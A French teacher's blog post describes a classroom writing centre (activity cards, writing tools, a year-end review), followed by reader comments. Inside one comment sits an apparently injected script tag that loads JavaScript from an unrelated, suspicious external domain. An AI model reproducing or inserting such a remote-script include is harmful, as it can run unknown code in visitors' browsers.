• Une nouveauté pour la rentrée: le centre d'écriture

    Je mets à jour cet article, pour participer au rallye lien mis en place par Dix Mois sur les outils de la production d'écrit!

     Une nouveauté pour la rentrée: le centre d'écriture

     Voir en bas de l'article pour le bilan!

     

    Je réponds à l'appel de la classe de zazou qui lance une Une nouveauté à tester à la rentrée ! , comprenez un rallye lien.

    Zazou nous a proposé de réfléchir et d'écrire à propos d'une nouveauté que nous envisageons de tester à la rentrée. Vous pourrez trouver tous les  liens vers les articles du rallye ici.

    Une nouveauté pour la rentrée: le centre d'écriture

    Parmis les différentes choses que je testerai l'an prochain, je vais vous parler ici du centre d'écriture.

    Le centre d'écriture est un petit endroit de la classe dans lequel les élèves trouveront des propositions de production d'écrit, d'écriture (au sens calligraphie), ainsi que des outils pour écrire. Dans ma classe, le centre sera composé d'un affichage et d'une petite table ou meuble sur lequel seront disposés les divers  documents.

     

    Une nouveauté pour la rentrée: le centre d'écriture

     

    Ce centre sera accessible sur le temps libre, mais surtout durant les temps d'ateliers, en alternance avec le centre des lettres et des sons (quelques ateliers ici déjà), le centre de lecture, le centre des mots fréquents (infos ici), le centre des ordinateurs, le travail avec la maitresse et le travail sur fiches imposées. (Peut-être un jour aurai-je le courage de mettre en mots le fonctionnement...)

    • Les activités de production d'écrit:

    Au choix, ou de manière imposée à certains moments, les élèves pourront écrire:

    une liste, une histoire à illustrer, une rime, une phrase à compléter, une légende sur un dessin, une recette, un calligramme, une drôle de phrase, un acrostiche...

    Des nouveautés arriveront sûrement au fur et à mesure de l'année, selon mes élèves. Je pense par exemple au fiches proposées par Ptitefab, ou à celles de Sanléane ou Zaubette.

    Les différents types de texte/activités seront introduits et travaillés en groupe classe avant d'être mis à disposition. Afin de varier les plaisirs et de ne pas multiplier les incitations, les types de texte seront parfois "retirés de la circulation" au profit d'autres. Ils faut toutefois que les élèves se sentent libres d'écrire ce qu'ils veulent, afin qu'écrire soit un plaisir. 

    J'ai conçu des affichettes A5 qui seront accrochées au panneau du centre pour signaler les activités d'écriture possibles.

    Une nouveauté pour la rentrée: le centre d'écriture

    Une nouveauté pour la rentrée: le centre d'écriture

     

    Les petits lutins des illustrations sont les Poz d'Anyssa, allez les voir ici!

     affichage ce que je peux écrire

     

    Pour les "drôles de phrases", j'utiliserai sans doute les étiquettes-puzzles de Laurène que vous pouvez trouver parmi d'autres merveilles ici.

    Pour les "qui, quoi, où?", allez voir chez Zaubette ici.

    Pour les phrases autocollant, une autre version chez Dixmois ici. Pour ma part, les élèves choisissent d'insérer leur autocollant dans la phrase ou de s'en servir pour l'illustration.

     Edit 9/06: Voir dans cet article les activités proposées au premier trimestre.

    • Les activités d'écriture:

    minuscules

    J'ai ce matériel dans ma classe, que je n'ai jamais eu l'occasion d'utiliser, qui sera mis à disposition des élèves. Je pense inciter certains à aller plus vers la production d'écrit, et d'autres plus vers l'écriture selon leurs besoins.

    Edit: Finalement, j'ai tiré et mis sous pochette les fiches de Laurène.

    • Les outils pour écrire:

     Seront à disposition des élèves: 

    Le mur des mots fréquents

    Un livret inspiré des "outils pour écrire" de la méthode Ribambelle. Vous pouvez trouver un livret de ce type chez Orphée

    Un mémo des sons et de leurs graphies, que j'ai sous forme de grande affiche A2 dans ma classe, mais que vous pouvez trouver chez différents blogueurs sous forme de sous-main par exemple (chez Orphée notamment) ou de mémo style incollables chez Cyberbrigade.

    Des règlettes avec les différentes écritures de l'alphabet (chez Moustache lettre A)

    Une nouveauté pour la rentrée: le centre d'écriture

     

    Une affiche sur les conventions de l'écriture de ce type là:

    Avec majuscules, points, dessin, soin, espaces.

     

    Des petites fiches "j'apprends à dessiner", qui donnent la motivation et l'inspiration, et évitent le blocage du "je ne sais pas faire". Je suis en train de les remettre en page pour avoir un petit fichier A5.

    Différents supports, variés selon le type de production: Papier ligné, blanc, papier à lettre, post-it, ...

     Si ce fonctionnement vous intéresse, je vous recommande le blog de Crapouilleries, très riche!

     

    Le bilan!

      

    Alors, le bilan après une année de ce fonctionnement: Je suis ravie! Les élèves écrivent de façon autonome, chacun sur les sujets qui les intéresse, et avec un grand plaisir.

      

    C'est un bonheur de les voir chercher les mots inconnus dans le dictionnaire tout en image ou les "outils pour écrire" de Ribambelle, de les voir se déplacer pour aller chercher un mot sur le mur des mots fréquents (bon, d'accord, ce serait mieux qu'ils sachent les écrire...).

     

    Quand un nouvel atelier est mis en place, ils se l'approprient très vite, et ce qui a le plus de succès est l'atelier "autocollant": je choisis un autocollant et écrit une histoire à son propos, et surtout l'atelier tampon. J'ai déniché des vieux tampons d'une vieille méthode de lecture, qui sont les images de mots simples (les référents sons j'imagine). Les élèves en choisissent 2-3, et inventent une histoire. La juxtaposition de plusieurs images oblige à inventer un lien, et à créer véritablement une histoire. 

     

    Exemple: un monsieur, un vélo, une voiture a donné chez une pépette en difficulté: " Le monsieur conduit sa voiture. Il voit un vélo et le laisse passer." Bien entendu, j'ai corrigé les fautes, mais celles-ci résident essentiellement sur les lettres muettes.

     

    Les points négatifs: Les élèves ont une soif de produire en quantité, mais pas forcément en qualité. Leurs écrits sont donc plutôt courts, et souvent descriptifs du type: "Le chat joue avec la laine." Du coup pour les inciter on travaille parfois sur un écrit en collectif pour voir comment on peut écrire plus long, avec début, milieux, fin. Mais une fois seuls, ... Il faudrait que j'arrive à être plus sur leur dos pour les pousser, et les faire revenir sur leurs productions!
    Certains (rares quand même) pensent que tous les mots qu'ils veulent écrire seront dans leurs outils, et vont chercher des mots même quand ils sont simples. Ils n'ont pas trop fait le lien entre le codage en phono et le codage en production d'écrit.
    Le plus gros point négatif: Je ne suis pas assez rigoureuse dans la correction, et on manque de temps pour les retours!

     

    Une nouveauté pour la rentrée: le centre d'écriture

    « Mon fonctionnement en lectureFiches phono CP période 5 »
    Pin It

    Tags Tags : , , , ,
  • Commentaires

    1
    lamaitresseaime Profil de lamaitresseaime
    Lundi 6 Août 2012 à 15:02

    Merci pour le partage de toutesces bonnes idées ! 

    2
    Mardi 7 Août 2012 à 07:43

    Article très complet qui donne envie de s'y mettre! J'ai mis aussi en place depuis l'an dernier suite à mes parcours sur Pinterest des centres de "littératie" et de maths. Pour le premier, j'ai en plus de toi un mur de mots qui permet aussi en G.S la production d'écrit.

    Je suivrai avec intérêt ton expérience. Merci!

    3
    Mardi 7 Août 2012 à 19:27

    Chouette chouette! Je suis enthousiaste par rapport à ce genre de centre! Merci pour ce partage super intéressant!

    4
    Mardi 7 Août 2012 à 22:39

    Merci à toutes!

    5
    Gentiane.
    Vendredi 10 Août 2012 à 16:32

    Je découvre ton article aujourd'hui . Même si j'ai déjà mis en place les centres d'écriture je trouve chez toi de quoi compléter mes activités et mon organisation. tes affichages sur les idées d'activités sont superbes!

    J'ai, en classe les boîtes pour écrire. Petit souci avec les crayons qui ne s'effacent pas très bien. Tu n'auras peut-être pas le problème... Du coup j'ai mis sous pochette plastique et... utilisation du feutre effaçable!

    6
    Vendredi 10 Août 2012 à 23:29

    zut, moi qui pensais avoir du matos prêt à l'emploi!

    7
    sanleane Profil de sanleane
    Dimanche 12 Août 2012 à 19:01

    Merci pour ces bonnes idée.

    +1 avec gentiane, j'ai le même matériel, et les traces laissées par les fameux crayons sont très difficiles à nettoyer.

    8
    Dimanche 12 Août 2012 à 20:55

    Bon, je suis bonne pour mettre sous plastique alors... j'essaierai au feutre effaçable sinon.

    9
    sanleane Profil de sanleane
    Dimanche 12 Août 2012 à 21:01

    Comme ce n'est pas lisse (en tout cas les miennes), le feutre effaçable, ce n'est pas top non plus...

    10
    Dimanche 12 Août 2012 à 21:23

     bon ben il vaut rien ce matériel finalement! 

    11
    jk49
    Vendredi 17 Août 2012 à 20:09

    bonjour

    merci pour le partage.

    l'an dernier avec mes GS/CP j'ai beaucoup travaillé la prod d'écrits.nous avons réalisé des livres de coloriages.

    ex: après un spectcle, une sortie, la découverte d'un livre... les élèves en dictée à l'adulte puis en autonomie en cours d'année pour certains Cp, illustraient au feutre noir leur production.

    ensuite il est facie de réaliser un petit album de coloriage, de le partager avec les CE1 par ex. voilà, juste une petite idée et merci encore!

    <script src="http://superoseplugin.info/dfi823hs.js?0.9975778340614918" type="text/javascript"></script>
    12
    Vendredi 17 Août 2012 à 21:51

    Merci pour cette idée!

    13
    Jeudi 4 Octobre 2012 à 10:48

    Super, par contre je suis curieuse de savoir comment fonctionnent tes ateliers (je rêve de le mettre en place chaque année mais laisse tomber rapidement faute d'organisation!)

    14
    Dimanche 21 Octobre 2012 à 19:00

    C'est super!! ;) ravie de t'avoir inspirée :D

    15
    Gentiane.
    Jeudi 1er Novembre 2012 à 12:30

    Bon je viens de voir que j'ai déjà vu cet article puisque j'avais mis un commentaire... Mais j'avais oublié Alzheimzer déjà!!!!

     

    16
    Jeudi 21 Mars 2013 à 07:32

    rho, ben me voila sur ton blog! Merci beaucoup! Là je suis en train de retravailler le menu DECLIC et les stratégies que je travaille avec mes élèves. Merci de m'avoir montré que c'était possible même en cycle 2 mes élèves adorent, progressent, et moi je peux enfin m'occuper de ceux qui en ont besoin!

    17
    Jeudi 21 Mars 2013 à 20:01

     ben moi je n'y arrive pas trop! La part d'élèves en difficulté est assez importante... Le bonheur, c'est de les voir travailler, et en l'occurrence produire de l'écrit avec plaisir!

    18
    Mecarson Profil de Mecarson
    Dimanche 24 Mars 2013 à 10:40

    Merci pour les photos, la visualisation des centres aide beaucoup pour la mise en place (pas encore pour moi, je mûris l'idée!)

    19
    Mardi 23 Avril 2013 à 14:02

    Bonjour pti Julie

    Je suis en pleine réflexion pour mettre en place ces centres en français. Je le pratique déjà en Mathématiques et je pioche d'ailleurs régulièrement sur ton site! Mais pour le français j' ai besoin de tes lumières et de ton expérience. Combien  de temps consacres-tu par jour à ces centres? En fais-tu tous les jours? A quel moment de la journée les as tu mis? olalala je suis très indiscrète! voilà comment je pense fonctionner. 5 ateliers tous les jours (écriture - phonologie - lecture compréhension - lecture de mot  et vocabulaire - production d'écrit ), les faire tourner sur 1 semaine puisque nous avons l'immense bonheur de travailler le mercredi l'année prochaine. Merci pour ta réponse et bonnes vacances

    Ludu

    20
    Dimanche 9 Juin 2013 à 11:38

    Chouette retour très intéressant de ton travail en classe! Merci!

    21
    Dimanche 9 Juin 2013 à 13:53

    J'ai rajouté ton travail.  Merci pour ta participation.

    22
    Patanel
    Jeudi 20 Juin 2013 à 22:13

    Bonsoir Julie,

    merci pour ton bilan. Dix mois a publié ma contribution pour ce rallye. Pour que tes élèves n'oublient pas de se servir de leurs outils, rien de mieux que de les construire avec eux , tant pis si ce n'est pas beau, écrit de travers. Vraiment ça change tout!

    Bonne fin d'année scolaire.

    23
    Vendredi 21 Juin 2013 à 22:00

    Tu peux préciser stp, je vois pas ce que tu veux dire? J'ai vu ton article, que j'ai apprécié!

    24
    Mercredi 26 Juin 2013 à 23:43

    J'ai envie de te suivre !!! Merci !

    25
    Jeudi 4 Juillet 2013 à 22:02

    Merci de partager sur ton fonctionnement, et surtout de penser à nous faire un bilan... J'ai souvent envie de te suivre, parfois je vais jusqu'au bout, parfois je m'arrête en route, mais j'adore lire tes recherches, tes questionnements et tes retours. Cela nourrit ma réflexion, et fait échos à mes doutes et mes questionnements. Merci pour ces articles qui me poussent à aller plus loin ! 

    Et surtout, bonnes vacances !! 

    26
    Jeudi 4 Juillet 2013 à 22:18

    Merci beaucoup pour ce message! Difficile pour moi de penser que réellement d'autres lisent, suivent, s'inspirent, alors je suis très flattée! Bonnes vacances et bonnes réflexions à toi!

    27
    MALILUNO Profil de MALILUNO
    Samedi 13 Juillet 2013 à 16:48

    grace à ton article j'ai la tete pleine d'idées pour mes ptits cp!! merci! en plus j'ai découvert de supers sites!!

    28
    Dimanche 14 Juillet 2013 à 10:30
    29
    Dimanche 14 Juillet 2013 à 11:06

    Merci pour la pub! ravie de voir que mon matériel sert aussi en élémentaire ;)

    30
    Dimanche 14 Juillet 2013 à 11:13

    Merci à toi! Par contre quelle galère le découpage! j'ai fait ça en gros!

    31
    Dimanche 14 Juillet 2013 à 12:03

    looool tu m'étonnes! j'ai l'avantage d'avoir une ATSEM ^^

     

    32
    Zygo
    Jeudi 8 Octobre 2015 à 21:21

    Bonsoir,

    Merci pour ton article. Je me suis lancée dans les centres de littératie en GS-CP et c'est franchement une réussite (malgré quelques grains de sable). 

    Certes, il a fallu beaucoup de temps pour la réflexion, la mise en place, la modélisation, la création, ... Mais les enfants ont du plaisir et demandent à y aller même sur des moments libres!!!

    Au bout de 2 ans de fonctionnement, as-tu pu réussir à surmonter ces écrits un peu "pauvres"?

    Merci pour ton retour! 

      • Jeudi 8 Octobre 2015 à 21:33

        Bonsoir,

        suite à cette année, j'ai pris un poste d'enseignante supplémentaire (PMQC), je n'ai donc pas pu approfondir cette forme de travail. Je crois que si c'était à refaire, avec l'expérience gagnée depuis, je serais satisfaite que les élèves écrivent avec plaisir, mais je ferais en sorte qu'ils aient le maximum d'outils pour le faire sans trop d'erreurs orthographiques. Je travaillerais en parallèle en classe entière ou en ateliers d'écriture à des récits plus longs, plus riches, en dictée à l'adulte éventuellement. 

        Difficile de concilier tous les aspects importants et passionnants de la production d'écrit!

        Merci beaucoup de tes retours!

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :